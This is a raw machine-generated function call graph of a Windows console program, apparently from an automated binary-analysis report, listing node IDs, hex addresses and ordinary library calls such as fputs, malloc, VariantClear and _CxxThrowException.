75085->75090 75158 189736 VariantClear 75086->75158 75155 189597 VariantClear 75087->75155 75091 198032 75088->75091 75088->75093 75090->74948 75090->74949 75154 189604 VariantClear 75091->75154 75093->75086 75156 1895df VariantClear 75093->75156 75096->74961 75097->74961 75098->74964 75099->74979 75100->74992 75101->74994 75103 1830fd 75102->75103 75103->75103 75104 181e0c ctype 2 API calls 75103->75104 75107 18311d 75103->75107 75105 183113 75104->75105 75165 181e40 free 75105->75165 75107->75001 75108->75001 75109->75003 75110->75009 75111->75011 75112->75015 75113->75019 75114->75021 75115->74961 75116->75008 75117->75018 75118->75027 75119->75030 75120->75034 75124->75072 75125->75072 75126->75072 75127->75072 75128->75072 75129->75035 75136->75050 75143->74974 75144->74976 75145->74981 75146->74985 75147->74989 75148->74961 75159 189767 75149->75159 75151 189518 SysAllocStringLen 75152 189539 _CxxThrowException 75151->75152 75153 18954f 75151->75153 75152->75153 75153->75086 75154->75086 75155->75086 75156->75086 75157->75086 75158->75083 75160 189779 75159->75160 75161 189770 75159->75161 75164 189686 VariantClear 75160->75164 75161->75151 75163 189780 75163->75151 75164->75163 75165->75107 75167 1d151b __EH_prolog 75166->75167 75173 1d10d3 75167->75173 75170 1d1589 75170->74886 75171 1d1552 _CxxThrowException 75171->74886 75172->74888 75174 1d10dd __EH_prolog 75173->75174 75205 1cd1b7 75174->75205 75176 1d12ef 75176->75170 75176->75171 75177 1d11f4 75177->75176 75204 18b95a 6 API calls 75177->75204 75178 1d139e 75178->75176 75180 1d13c4 75178->75180 75181 181e0c ctype 2 API calls 75178->75181 75182 191168 10 API calls 75180->75182 75181->75180 75186 1d13da 75182->75186 75183 191168 10 API calls 75183->75177 75184 1d13de 75253 181e40 free 75184->75253 75186->75184 75188 1d13f9 75186->75188 75247 1cef67 _CxxThrowException 75186->75247 75212 1cf047 75188->75212 75191 1d14ba 75251 1d0943 50 API calls 2 library calls 75191->75251 75192 1d1450 75216 1d06ae 75192->75216 75196 1d14e7 75252 1b2db9 free ctype 75196->75252 75204->75178 75254 1cd23c 75205->75254 75207 1cd1ed 75261 181e40 free 75207->75261 75209 1cd209 75262 181e40 free 75209->75262 75211 1cd21c 75211->75176 75211->75177 75211->75183 75213 1cf063 75212->75213 75214 1cf072 75213->75214 75290 1cef67 _CxxThrowException 75213->75290 75214->75191 75214->75192 75248 1cef67 _CxxThrowException 75214->75248 75217 1d06b8 __EH_prolog 75216->75217 75291 1d03f4 75217->75291 75222 1d08e3 _CxxThrowException 75224 1d08f7 75222->75224 75229 1cb8dc ctype free 75224->75229 75227 18429a 3 API calls 75230 1d0715 75227->75230 75230->75222 75230->75224 75230->75227 75233 181e0c ctype 2 API calls 75230->75233 75245 1d0877 75230->75245 75246 1cef67 _CxxThrowException 75230->75246 75321 1912a5 75230->75321 75326 1c81ec 75230->75326 75233->75230 75412 1cb8dc 75245->75412 75246->75230 75247->75188 75248->75192 75251->75196 75252->75184 75253->75176 75263 1cd2b8 75254->75263 75257 1cd25e 75280 181e40 free 75257->75280 75260 1cd275 75260->75207 75261->75209 75262->75211 75282 181e40 free 75263->75282 75265 1cd2c8 75283 181e40 free 75265->75283 75267 1cd2dc 75284 181e40 free 75267->75284 75269 1cd2e7 75285 181e40 free 75269->75285 75271 1cd2f2 75286 181e40 free 75271->75286 75273 1cd2fd 75287 181e40 free 75273->75287 75275 1cd308 75288 181e40 free 75275->75288 75277 1cd313 75278 1cd246 75277->75278 75289 181e40 free 75277->75289 75278->75257 75281 181e40 free 75278->75281 75280->75260 75281->75257 75282->75265 75283->75267 75284->75269 75285->75271 75286->75273 75287->75275 75288->75277 75289->75278 75290->75214 75292 1cf047 _CxxThrowException 75291->75292 75293 1d0407 75292->75293 75294 1cf047 _CxxThrowException 75293->75294 75295 1d0475 75293->75295 75297 1d0421 75294->75297 75310 1d049a 75295->75310 75429 1cfa3f 22 API calls 2 library calls 75295->75429 75296 1d04b8 75299 1d04e8 75296->75299 75300 1d04cd 75296->75300 75301 1d043e 75297->75301 75426 1cef67 _CxxThrowException 75297->75426 75432 1d7c4a malloc _CxxThrowException free ctype 75299->75432 75431 1cfff0 9 API calls 2 library calls 75300->75431 75427 1cf93c 7 API calls 2 library calls 75301->75427 75302 1d0492 75306 1cf047 _CxxThrowException 75302->75306 75306->75310 75308 1d04db 75313 1cf047 _CxxThrowException 75308->75313 75310->75296 75430 1d159a malloc _CxxThrowException free ctype 75310->75430 75311 1d04e3 75316 1d054a 75311->75316 75434 1cef67 _CxxThrowException 75311->75434 75312 1d0446 75314 1d046d 75312->75314 75428 1cef67 _CxxThrowException 75312->75428 75313->75311 75315 1cf047 _CxxThrowException 75314->75315 75315->75295 75316->75230 75317 1d04f3 75317->75311 75433 19089e malloc _CxxThrowException free _CxxThrowException memcpy 75317->75433 75322 1c04d2 5 API calls 75321->75322 75327 1c81f6 __EH_prolog 75326->75327 75426->75301 75427->75312 75428->75314 75429->75302 75430->75296 75431->75308 75432->75317 75433->75317 75434->75316 75511 1acefb 75512 1ad0cc 75511->75512 75513 1acf03 75511->75513 75513->75512 75558 1acae9 VariantClear 75513->75558 75515 1acf59 75515->75512 75559 1acae9 VariantClear 75515->75559 75517 1acf71 75517->75512 75560 1acae9 VariantClear 75517->75560 75519 1acf87 75519->75512 75561 1acae9 VariantClear 75519->75561 75521 1acf9d 75521->75512 75562 1acae9 VariantClear 75521->75562 75523 1acfb3 75523->75512 75563 1acae9 VariantClear 75523->75563 75525 1acfc9 75525->75512 75564 184504 malloc _CxxThrowException 75525->75564 75527 1acfdc 75528 182e04 2 API calls 75527->75528 75530 1acfe7 75528->75530 75529 1ad009 75532 1ad07b 75529->75532 75534 1ad080 75529->75534 75535 1ad030 75529->75535 75530->75529 75531 182f88 3 API calls 75530->75531 75531->75529 75572 181e40 free 75532->75572 75569 1a7a0c CharUpperW 75534->75569 75538 182e04 2 API calls 75535->75538 75536 1ad0c4 75573 181e40 free 75536->75573 75541 1ad038 75538->75541 75540 1ad08b 75570 19fdbc 4 API calls 2 library calls 75540->75570 75542 182e04 2 API calls 75541->75542 75544 1ad046 75542->75544 75565 19fdbc 4 API calls 2 library calls 75544->75565 75545 1ad0a7 75547 182fec 3 API calls 75545->75547 75549 1ad0b3 75547->75549 75548 1ad057 75550 182fec 3 API calls 75548->75550 75571 181e40 free 75549->75571 75552 1ad063 75550->75552 75566 181e40 free 75552->75566 75554 1ad06b 75567 181e40 free 75554->75567 75556 1ad073 75568 181e40 free 75556->75568 75558->75515 75559->75517 75560->75519 75561->75521 75562->75523 75563->75525 75564->75527 75565->75548 75566->75554 75567->75556 75568->75532 75569->75540 75570->75545 75571->75532 75572->75536 75573->75512 75574 18c3bd 75575 18c3db 75574->75575 75576 18c3ca 75574->75576 75576->75575 75578 181e40 free 75576->75578 75578->75575 75579 1b993d 75663 1bb5b1 75579->75663 75582 1b9963 75669 191f33 75582->75669 75585 1b9975 75586 1b99b7 GetStdHandle GetConsoleScreenBufferInfo 75585->75586 75587 1b99ce 75585->75587 75586->75587 75588 181e0c ctype 2 API calls 75587->75588 75589 1b99dc 75588->75589 75790 1a7b48 75589->75790 75591 1b9a29 75819 1bb96d _CxxThrowException 75591->75819 75593 1b9a30 75820 1a7018 8 API calls 2 library calls 75593->75820 75595 1b9a7c 75821 1addb5 6 API calls 2 library calls 75595->75821 75597 1b9a66 _CxxThrowException 75597->75595 75598 1b9aa6 75599 1b9aaa _CxxThrowException 75598->75599 75609 1b9ac0 75598->75609 75599->75609 75600 1b9a37 75600->75595 75600->75597 75601 1b9b3a 75825 181fa0 fputc 75601->75825 75604 1b9bfa _CxxThrowException 75623 1b9be6 75604->75623 75605 1b9b63 fputs 75826 181fa0 fputc 75605->75826 75608 1b9b79 strlen strlen 75610 1b9baa fputs fputc 75608->75610 75611 1b9e25 75608->75611 75609->75601 75609->75604 75822 1a7dd7 7 API calls 2 library calls 75609->75822 75823 1bc077 6 API calls 75609->75823 75824 181e40 free 75609->75824 75610->75623 75834 181fa0 fputc 75611->75834 75614 1b9e2c fputs 75835 181fa0 fputc 75614->75835 75616 1b9f0c 75840 181fa0 fputc 75616->75840 75620 1bb67d 12 API calls 75620->75623 75621 1b9f13 fputs 75622 1b9e42 75622->75616 75656 1b9ee0 fputs 75622->75656 75836 1bb650 fputc fputs fputs fputc 75622->75836 75837 1821d8 fputs 75622->75837 75838 1bbde4 fputc fputs 75622->75838 75623->75610 75623->75611 75623->75620 75627 182e04 2 API calls 75623->75627 75641 1b9d2a fputs 75623->75641 75645 1b9d5f fputs 75623->75645 75646 1831e5 malloc _CxxThrowException free _CxxThrowException 75623->75646 75827 1821d8 fputs 75623->75827 75828 18315e malloc _CxxThrowException free _CxxThrowException 75623->75828 75829 183221 malloc _CxxThrowException free _CxxThrowException 75623->75829 75830 181089 malloc _CxxThrowException free _CxxThrowException 75623->75830 75832 181fa0 fputc 75623->75832 75833 181e40 free 75623->75833 75627->75623 75831 1821d8 fputs 75641->75831 75645->75623 75646->75623 75839 181fa0 fputc 75656->75839 75664 1bb5bc fputs 75663->75664 75665 1b994a 75663->75665 75859 181fa0 fputc 75664->75859 75665->75582 75807 181fb3 75665->75807 75667 1bb5d5 75667->75665 75668 1bb5d9 fputs 75667->75668 75668->75665 75670 191f6c 75669->75670 75671 191f4f 75669->75671 75860 1929eb 75670->75860 75902 1a1d73 5 API calls __EH_prolog 75671->75902 75674 191f5e _CxxThrowException 75674->75670 75677 191fbc 75681 191fda 75677->75681 75682 182fec 3 API calls 75677->75682 75678 191fa3 75678->75677 75680 184fc0 5 API calls 75678->75680 75679 191f95 _CxxThrowException 75679->75678 75680->75677 75683 192022 wcscmp 75681->75683 75692 192036 75681->75692 75682->75681 75684 1920af 75683->75684 75683->75692 75904 1a1d73 5 API calls __EH_prolog 75684->75904 75686 1920a9 75905 19393c 6 API calls 2 library calls 75686->75905 75687 1920be _CxxThrowException 75687->75692 75689 1920f4 75906 19393c 6 API calls 2 library calls 75689->75906 75691 192108 75693 192135 75691->75693 75907 192e04 62 API calls 2 library calls 75691->75907 75692->75686 75695 19219a 75692->75695 75700 192159 75693->75700 75908 192e04 62 API calls 2 library calls 75693->75908 75909 1a1d73 5 API calls __EH_prolog 75695->75909 75698 1921a9 _CxxThrowException 75698->75700 75699 19227f 75865 192aa9 75699->75865 75700->75699 75702 192245 75700->75702 75910 1a1d73 5 API calls __EH_prolog 75700->75910 75705 182fec 3 API calls 75702->75705 75706 19225c 75705->75706 75706->75699 75911 1a1d73 5 API calls __EH_prolog 75706->75911 75707 1922d9 75710 192302 75707->75710 75712 182fec 3 API calls 75707->75712 75708 192237 _CxxThrowException 75708->75702 75709 182fec 3 API calls 75709->75707 75883 184fc0 75710->75883 75712->75710 75714 192271 _CxxThrowException 75714->75699 75717 192322 75718 1926c6 75717->75718 75726 1923a1 75717->75726 75719 1928ce 75718->75719 75720 192700 75718->75720 75924 1a1d73 5 API calls __EH_prolog 75718->75924 75721 19293a 75719->75721 75731 1928d5 75719->75731 75925 1932ec 14 API calls 2 library calls 75720->75925 75724 19293f 75721->75724 75725 1929a5 75721->75725 75942 184eec 16 API calls 75724->75942 75728 1929ae _CxxThrowException 75725->75728 75781 19264d 75725->75781 75734 19247a wcscmp 75726->75734 75751 19248e 75726->75751 75727 1926f2 _CxxThrowException 75727->75720 75729 192713 75926 193a29 75729->75926 75731->75781 75941 1a1d73 5 API calls __EH_prolog 75731->75941 75733 19294c 75943 184ea1 8 API calls 75733->75943 75737 1924cf wcscmp 75734->75737 75734->75751 75740 1924ef wcscmp 75737->75740 75737->75751 75743 19250f 75740->75743 75740->75751 75741 192953 75744 184fc0 5 API calls 75741->75744 75742 192920 _CxxThrowException 75742->75781 75915 1a1d73 5 API calls __EH_prolog 75743->75915 75744->75781 75747 19251e _CxxThrowException 75750 19252c 75747->75750 75748 1927cf 75752 192880 75748->75752 75755 19281f 75748->75755 75937 1a1d73 5 API calls __EH_prolog 75748->75937 75749 182fec 3 API calls 75753 1927a9 75749->75753 75757 192569 75750->75757 75916 192e04 62 API calls 2 library calls 75750->75916 75751->75750 75912 184eec 16 API calls 75751->75912 75913 184ea1 8 API calls 75751->75913 75914 1a1d73 5 API calls __EH_prolog 75751->75914 75756 19289b 75752->75756 75760 182fec 3 API calls 75752->75760 75753->75748 75936 183563 memmove 75753->75936 75755->75752 75766 192847 75755->75766 75938 1a1d73 5 API calls __EH_prolog 75755->75938 75756->75781 75940 1a1d73 5 API calls __EH_prolog 75756->75940 75759 19258c 75757->75759 75917 192e04 62 API calls 2 library calls 75757->75917 75764 1925a4 75759->75764 75918 192a61 malloc _CxxThrowException free _CxxThrowException memcpy 75759->75918 75760->75756 75761 1924c1 _CxxThrowException 75761->75737 75919 184eec 16 API calls 75764->75919 75765 192811 _CxxThrowException 75765->75755 75766->75752 75939 1a1d73 5 API calls __EH_prolog 75766->75939 75773 1925ad 75920 1a1b07 49 API calls 75773->75920 75774 1928c0 _CxxThrowException 75774->75719 75775 192839 _CxxThrowException 75775->75766 75776 192872 _CxxThrowException 75776->75752 75778 1925b4 75921 184ea1 8 API calls 75778->75921 75780 1925bb 75782 182fec 3 API calls 75780->75782 75784 1925d6 75780->75784 75781->75585 75782->75784 75783 19261f 75783->75781 75786 182fec 3 API calls 75783->75786 75784->75781 75784->75783 75922 1a1d73 5 API calls __EH_prolog 75784->75922 75788 19263f 75786->75788 75787 192611 _CxxThrowException 75787->75783 75923 18859e malloc _CxxThrowException free _CxxThrowException 75788->75923 75791 1a7b52 __EH_prolog 75790->75791 75962 1a7eec 75791->75962 75794 1a7ca4 75794->75591 75795 1830ea malloc _CxxThrowException free 75797 1a7b63 75795->75797 75796 182e04 malloc _CxxThrowException 75796->75797 75797->75794 75797->75795 75797->75796 75799 181e40 free ctype 75797->75799 75801 1c04d2 5 API calls 75797->75801 75802 1912a5 5 API calls 75797->75802 75803 18429a 3 API calls 75797->75803 75805 1a7c61 memcpy 75797->75805 75806 1a7193 free 75797->75806 75967 1a70ea 75797->75967 75970 1a7a40 75797->75970 75988 1a7cc3 6 API calls 75797->75988 75989 1a74eb malloc _CxxThrowException memcpy __EH_prolog ctype 75797->75989 75799->75797 75801->75797 75802->75797 75803->75797 75805->75797 75806->75797 75808 181fbd __EH_prolog 75807->75808 75996 1826dd 75808->75996 75811 182e47 2 API calls 75812 181fda 75811->75812 75999 182010 75812->75999 75814 181fed 76002 181e40 free 75814->76002 75816 181ff5 76003 181e40 free 75816->76003 75818 181ffd 75818->75582 75819->75593 75820->75600 75821->75598 75822->75609 75823->75609 75824->75609 75825->75605 75826->75608 75827->75623 75828->75623 75829->75623 75830->75623 75831->75623 75832->75623 75833->75623 75834->75614 75835->75622 75836->75622 75837->75622 75838->75622 75839->75622 75840->75621 75859->75667 75861 182f1c 2 API calls 75860->75861 75862 1929fe 75861->75862 75944 181e40 free 75862->75944 75864 191f7e 75864->75678 75903 1a1d73 5 API calls __EH_prolog 75864->75903 75866 192ab3 __EH_prolog 75865->75866 75878 192b0f 75866->75878 75945 182e8a 75866->75945 75868 1922ad 75868->75707 75868->75709 75871 192bc6 75955 1a1d73 5 API calls __EH_prolog 75871->75955 75872 192b04 75950 181e40 free 75872->75950 75875 192bd6 _CxxThrowException 75875->75868 75878->75868 75878->75871 75880 192b9f 75878->75880 75951 192cb4 48 API calls 2 library calls 75878->75951 75952 192bf5 8 API calls __EH_prolog 75878->75952 75953 192a61 malloc _CxxThrowException free _CxxThrowException memcpy 75878->75953 75880->75868 75954 1a1d73 5 API calls __EH_prolog 75880->75954 75882 192bb8 _CxxThrowException 75882->75871 75884 184fd2 75883->75884 75890 184fce 75883->75890 75885 1a7ebb free 75884->75885 75886 184fd9 75885->75886 75887 185006 75886->75887 75888 184fe9 _CxxThrowException 75886->75888 75889 184ffe 75886->75889 75887->75890 75957 181524 malloc _CxxThrowException __EH_prolog ctype 75887->75957 75888->75889 75956 1c0551 malloc _CxxThrowException free memcpy ctype 75889->75956 75893 19384c 75890->75893 75899 193856 __EH_prolog 75893->75899 75894 182e04 malloc _CxxThrowException 75894->75899 75895 182fec 3 API calls 75895->75899 75896 1c04d2 5 API calls 75896->75899 75897 182f88 3 API calls 75897->75899 75899->75894 75899->75895 75899->75896 75899->75897 75900 181e40 free ctype 75899->75900 75901 193917 75899->75901 75958 193b76 malloc _CxxThrowException __EH_prolog ctype 75899->75958 75900->75899 75901->75717 75902->75674 75903->75679 75904->75687 75905->75689 75906->75691 75907->75693 75908->75700 75909->75698 75910->75708 75911->75714 75912->75751 75913->75751 75914->75761 75915->75747 75916->75757 75917->75759 75918->75764 75919->75773 75920->75778 75921->75780 75922->75787 75923->75781 75924->75727 75925->75729 75927 193a3b 75926->75927 75933 192722 75926->75933 75959 193bd9 free ctype 75927->75959 75929 193a42 75930 193a6f 75929->75930 75931 193a52 _CxxThrowException 75929->75931 75932 193a67 75929->75932 75930->75933 75961 193b76 malloc _CxxThrowException __EH_prolog ctype 75930->75961 75931->75932 75960 1c0551 malloc _CxxThrowException free memcpy ctype 75932->75960 75933->75748 75933->75749 75936->75748 75937->75765 75938->75775 75939->75776 75940->75774 75941->75742 75942->75733 75943->75741 75944->75864 75946 182ea0 75945->75946 75946->75946 75947 182ba6 2 API calls 75946->75947 75948 182eaf 75947->75948 75949 192a61 malloc _CxxThrowException free _CxxThrowException memcpy 75948->75949 75949->75872 75950->75878 75951->75878 75952->75878 75953->75878 75954->75882 75955->75875 75956->75887 75957->75887 75958->75899 75959->75929 75960->75930 75961->75930 75963 1a7f14 75962->75963 75965 1a7ef7 75962->75965 75963->75797 75964 1a7193 free 75964->75965 75965->75963 75965->75964 75990 181e40 free 75965->75990 75968 182e04 2 API calls 75967->75968 75969 1a7103 75968->75969 75969->75797 75971 1a7a4a __EH_prolog 75970->75971 75991 18361b 6 API calls 2 library calls 75971->75991 75973 1a7a78 75992 18361b 6 API calls 2 library calls 75973->75992 75975 1a7a83 75976 1a7b20 75975->75976 75978 182e04 malloc _CxxThrowException 75975->75978 75982 182fec 3 API calls 75975->75982 75983 182fec 3 API calls 75975->75983 75984 1c04d2 5 API calls 75975->75984 75987 181e40 free ctype 75975->75987 75993 1a7955 malloc _CxxThrowException __EH_prolog ctype 75975->75993 75994 1b2db9 free ctype 75976->75994 75978->75975 75979 1a7b2b 75995 1b2db9 free ctype 75979->75995 75981 1a7b37 75981->75797 75982->75975 75985 1a7aca wcscmp 75983->75985 75984->75975 75985->75975 75987->75975 75988->75797 75989->75797 75990->75965 75991->75973 75992->75975 75993->75975 75994->75979 75995->75981 75997 181e0c ctype 2 API calls 75996->75997 75998 181fcb 75997->75998 75998->75811 76004 182033 75999->76004 76002->75816 76003->75818 76005 18203b 76004->76005 76006 182054 76005->76006 76007 182045 76005->76007 76012 1837ff 9 API calls 76006->76012 76011 18421e malloc _CxxThrowException free _CxxThrowException _CxxThrowException 76007->76011 76010 182022 fputs 76010->75814 76011->76010 76012->76010 76015 206bc6 76016 206bca 76015->76016 76017 206bcd 76015->76017 76017->76016 76018 206bd1 malloc 76017->76018 76018->76016 76019 1badb7 76020 1badc1 __EH_prolog 76019->76020 76021 1826dd 2 API calls 76020->76021 76022 1bae1d 76021->76022 76023 182e04 2 API calls 76022->76023 76024 1bae38 76023->76024 76025 182e04 2 API calls 76024->76025 76026 1bae44 76025->76026 76027 182e04 2 API calls 76026->76027 76028 1bae68 76027->76028 76035 1bad29 76028->76035 76032 1bae94 76033 182e04 2 API calls 76032->76033 76034 1baeb2 76033->76034 76036 1bad33 __EH_prolog 76035->76036 76037 182e04 2 API calls 76036->76037 76038 1bad5f 76037->76038 76039 182e04 2 API calls 76038->76039 76040 1bad72 76039->76040 76041 1baf2d 76040->76041 76042 1baf37 __EH_prolog 76041->76042 76053 1934f4 malloc _CxxThrowException __EH_prolog 76042->76053 76044 1bafac 76045 182e04 2 API calls 76044->76045 76046 1bafbb 76045->76046 76047 182e04 2 API calls 76046->76047 76048 1bafca 76047->76048 76049 182e04 2 API calls 76048->76049 76050 1bafd9 76049->76050 76051 182e04 2 API calls 76050->76051 76052 1bafe8 76051->76052 76052->76032 76053->76044 76054 1c8eb1 76059 1c8ed1 76054->76059 76057 1c8ec9 76060 1c8edb __EH_prolog 76059->76060 76068 1c9267 76060->76068 76064 1c8efd 76073 1be5f1 free ctype 76064->76073 76066 1c8eb9 76066->76057 76067 181e40 free 76066->76067 76067->76057 76069 1c9271 __EH_prolog 76068->76069 76074 181e40 free 76069->76074 76071 1c8ef1 76072 1c922b free CloseHandle GetLastError ctype 76071->76072 76072->76064 76073->76066 76074->76071 76075 1b5475 76076 182fec 3 API calls 76075->76076 76077 1b54b4 76076->76077 76080 1bc911 76077->76080 76079 1b54bb 76081 1bc926 GetTickCount 76080->76081 76083 1bc92f 76080->76083 76081->76083 76085 1bcb64 76083->76085 76097 1bc96d 76083->76097 76144 182ab1 strcmp 76083->76144 76085->76079 76087 1bc9ce 76087->76085 76090 1827bb 3 API calls 76087->76090 76088 1bc95b 76088->76097 76145 183542 wcscmp 76088->76145 76094 1bc9e2 76090->76094 76092 1bca0a 76093 1bca21 76092->76093 76095 18286d 5 API calls 76092->76095 76096 1bcb10 76093->76096 76104 18286d 5 API calls 76093->76104 76094->76092 76147 18286d 76094->76147 76099 1bca16 76095->76099 76133 1bcb74 76096->76133 76097->76085 76125 1bc86a 76097->76125 76154 1828fa malloc _CxxThrowException free memcpy _CxxThrowException 76099->76154 76107 1bca40 76104->76107 76106 1bcb59 76159 1bcb92 malloc _CxxThrowException free 76106->76159 76108 182fec 3 API calls 76107->76108 76111 1bca4e 76108->76111 76117 182033 10 API calls 76111->76117 76113 1bcb49 76158 181f91 fflush 76113->76158 76114 1bcb50 76116 1827bb 3 API calls 76114->76116 76116->76106 76124 1bca6a 76117->76124 76118 1bcaf5 76157 1828fa malloc _CxxThrowException free memcpy _CxxThrowException 76118->76157 76120 182fec 3 API calls 76120->76124 76123 182033 10 API calls 76123->76124 76124->76118 76124->76120 76124->76123 76155 183599 memmove 76124->76155 76156 183402 malloc _CxxThrowException free memmove _CxxThrowException 76124->76156 76126 1bc88c __aulldiv 76125->76126 76127 1bc8d3 strlen 76126->76127 76128 1bc8f1 76127->76128 76129 1bc900 76127->76129 76128->76129 76131 18286d 5 API calls 76128->76131 76130 1828a1 5 API calls 76129->76130 76132 1bc90c 76130->76132 76131->76128 76132->76087 76146 182ab1 strcmp 76132->76146 76134 1bcb1c 76133->76134 76135 1bcb7c strcmp 76133->76135 76134->76106 76136 1bc7d7 76134->76136 76135->76134 76137 1bc7ea 76136->76137 76138 1bc849 76136->76138 76140 1bc7fe fputs 76137->76140 76160 1825cb malloc _CxxThrowException free _CxxThrowException ctype 76137->76160 76139 1bc85a fputs 76138->76139 76161 181f91 fflush 76138->76161 76139->76113 76139->76114 76140->76138 76144->76088 76145->76097 76146->76087 76162 181e9d 76147->76162 76150 1828a1 76151 1828b0 76150->76151 76151->76151 76167 18267f 76151->76167 76153 1828bf 76153->76092 76154->76093 76155->76124 76156->76124 76157->76096 76158->76114 76159->76085 76160->76140 76161->76139 76163 181ea8 76162->76163 76164 181ead 76162->76164 76166 18263c malloc _CxxThrowException free memcpy _CxxThrowException 76163->76166 76164->76150 76166->76164 76168 1826c2 76167->76168 76170 182693 76167->76170 76168->76153 76169 1826c8 _CxxThrowException 76172 1826dd 76169->76172 76170->76169 76171 1826bc 76170->76171 76176 182595 malloc _CxxThrowException free memcpy ctype 76171->76176 76174 181e0c ctype 2 API calls 76172->76174 76175 1826ea 76174->76175 76175->76153 76176->76168 76178 2069d0 76179 2069d4 76178->76179 76180 2069d7 malloc 76178->76180 76181 191368 76184 19136d 76181->76184 76183 19138c 76184->76183 76187 217d80 WaitForSingleObject 76184->76187 76190 1bf745 76184->76190 76194 217ea0 SetEvent GetLastError 76184->76194 76188 217d8e GetLastError 76187->76188 76189 217d98 76187->76189 76188->76189 76189->76184 76191 1bf74f __EH_prolog 76190->76191 76195 1bf784 76191->76195 76193 1bf765 76193->76184 76194->76184 76196 1bf78e __EH_prolog 76195->76196 76197 1912d4 4 API calls 76196->76197 76198 1bf7c7 76197->76198 76199 1912d4 4 API calls 76198->76199 76200 1bf7d4 76199->76200 76201 1bf871 76200->76201 76204 18c4d6 76200->76204 76210 206b23 VirtualAlloc 76200->76210 76201->76193 76208 18c4e9 76204->76208 76205 18c6f3 76205->76201 76206 19111c 10 API calls 76206->76208 76207 1911b4 107 API calls 76207->76208 76208->76205 76208->76206 76208->76207 76209 18c695 memmove 76208->76209 76209->76208 76210->76201 76211 1ba42c 76212 1ba449 76211->76212 76213 1ba435 fputs 76211->76213 76370 1b545d 76212->76370 76369 181fa0 fputc 76213->76369 76217 182e04 2 API calls 76218 1ba4a1 76217->76218 76374 1a1858 76218->76374 76220 1ba4c9 76436 181e40 free 76220->76436 76222 1ba4d8 76223 1ba4ee 76222->76223 76224 1bc7d7 ctype 6 API calls 76222->76224 76225 1ba50e 76223->76225 76437 1b57fb 76223->76437 76224->76223 76447 1bc73e 76225->76447 76229 1baae5 76602 1b2db9 free ctype 76229->76602 76231 1bac17 76603 1b2db9 free ctype 76231->76603 76232 181e0c ctype 2 API calls 76234 1ba53a 76232->76234 76236 1ba54d 76234->76236 76573 1bb0fa malloc _CxxThrowException __EH_prolog 76234->76573 76235 1bac23 76237 1bac3a 76235->76237 76239 1bac35 76235->76239 76241 182fec 3 API calls 76236->76241 76605 1bb96d _CxxThrowException 76237->76605 76604 1bb988 33 API calls __aulldiv 76239->76604 76248 1ba586 76241->76248 76243 1bac42 76606 181e40 free 76243->76606 76245 1bac4d 76246 1a3247 free 76245->76246 76247 1bac5d 76246->76247 76607 181e40 free 76247->76607 76465 1bad06 76248->76465 76252 1bac7d 76608 1811c2 free __EH_prolog ctype 76252->76608 76257 193a29 5 API calls 76259 1ba62e 76257->76259 76369->76212 76371 1b5473 76370->76371 76372 1b5466 76370->76372 76371->76217 76611 18275e malloc _CxxThrowException free ctype 76372->76611 76375 1a1862 __EH_prolog 76374->76375 76612 1a021a 76375->76612 76380 1a18b9 76626 1a1aa5 free __EH_prolog ctype 76380->76626 76382 1a1935 76631 1a1aa5 free __EH_prolog ctype 76382->76631 76383 1a18c7 76627 1b2db9 free ctype 76383->76627 76386 1a1944 76407 1a1966 76386->76407 76632 1a1d73 5 API calls __EH_prolog 76386->76632 76388 1a18d3 76388->76220 76390 1c04d2 5 API calls 76396 1a18db 76390->76396 76391 1a1958 _CxxThrowException 76391->76407 76392 1a19be 76635 1af1f1 malloc _CxxThrowException free _CxxThrowException 76392->76635 76395 182e04 2 API calls 76395->76407 76396->76382 76396->76390 76628 1a0144 malloc _CxxThrowException free _CxxThrowException 76396->76628 76629 181524 malloc _CxxThrowException __EH_prolog ctype 76396->76629 76630 181e40 free 76396->76630 76397 1a19d6 76399 1a7ebb free 76397->76399 76401 1a19e1 76399->76401 76400 18631f 9 API calls 76400->76407 76402 1912d4 4 API calls 76401->76402 76404 1a19ea 76402->76404 76403 1c04d2 5 API calls 76403->76407 76406 1a7ebb free 76404->76406 76408 1a19f7 76406->76408 76407->76392 76407->76395 76407->76400 76407->76403 76633 181524 malloc _CxxThrowException __EH_prolog ctype 76407->76633 76634 181e40 free 76407->76634 76410 1912d4 4 API calls 76408->76410 76417 1a19ff 76410->76417 76411 1a1a4f 76637 181e40 free 76411->76637 76412 181524 malloc _CxxThrowException 76412->76417 76414 1a1a57 76638 1b2db9 free ctype 76414->76638 76416 1a1a64 76639 1b2db9 free ctype 76416->76639 76417->76411 76417->76412 76420 1a1a83 76417->76420 76636 1842e3 CharUpperW 76417->76636 76640 1a1d73 5 API calls __EH_prolog 76420->76640 76422 1a1a97 _CxxThrowException 76423 1a1aa5 __EH_prolog 76422->76423 76641 181e40 free 76423->76641 76425 1a1ac8 76642 1a02e8 free ctype 76425->76642 76427 1a1ad1 76643 1a1eab free __EH_prolog ctype 76427->76643 76429 1a1add 76644 181e40 free 76429->76644 76431 1a1ae5 76645 181e40 free 76431->76645 76433 1a1aed 76646 1b2db9 free ctype 76433->76646 76435 1a1afa 76435->76220 76436->76222 76438 1b5805 __EH_prolog 76437->76438 76439 1b5847 76438->76439 76440 1826dd 2 API calls 76438->76440 76439->76225 76441 1b5819 76440->76441 76774 1b5678 76441->76774 76445 1b583f 76791 181e40 free 76445->76791 76448 1bc748 __EH_prolog 76447->76448 76449 1bc7d7 ctype 6 API calls 76448->76449 76450 1bc75d 76449->76450 76808 181e40 free 76450->76808 76452 1bc768 76453 1a2c0b ctype free 76452->76453 76454 1bc775 76453->76454 76809 181e40 free 76454->76809 76456 1bc77d 76810 181e40 free 76456->76810 76458 1bc785 76811 181e40 free 76458->76811 76460 1bc78d 76812 181e40 free 76460->76812 76462 1bc795 76463 1a2c0b ctype free 76462->76463 76464 1ba51d 76463->76464 76464->76229 76464->76232 76466 1bad29 2 API calls 76465->76466 76467 1ba5d8 76466->76467 76468 1bbf3e 76467->76468 76469 182fec 3 API calls 76468->76469 76470 1bbf85 76469->76470 76471 182fec 3 API calls 76470->76471 76472 1ba5ee 76471->76472 76472->76257 76573->76236 76602->76231 76603->76235 76604->76237 76605->76243 76606->76245 76607->76252 76611->76371 76613 1a0224 __EH_prolog 76612->76613 76647 193d66 76613->76647 76616 1a062e 76617 1a0638 __EH_prolog 76616->76617 76618 1a06de 76617->76618 76623 1a01bc malloc _CxxThrowException free _CxxThrowException memcpy 76617->76623 76625 1a06ee 76617->76625 76663 1a0703 76617->76663 76733 1b2db9 free ctype 76617->76733 76734 1a019a malloc _CxxThrowException free memcpy 76618->76734 76620 1a06e6 76735 1a1453 26 API calls 2 library calls 76620->76735 76623->76617 76625->76380 76625->76396 76626->76383 76627->76388 76628->76396 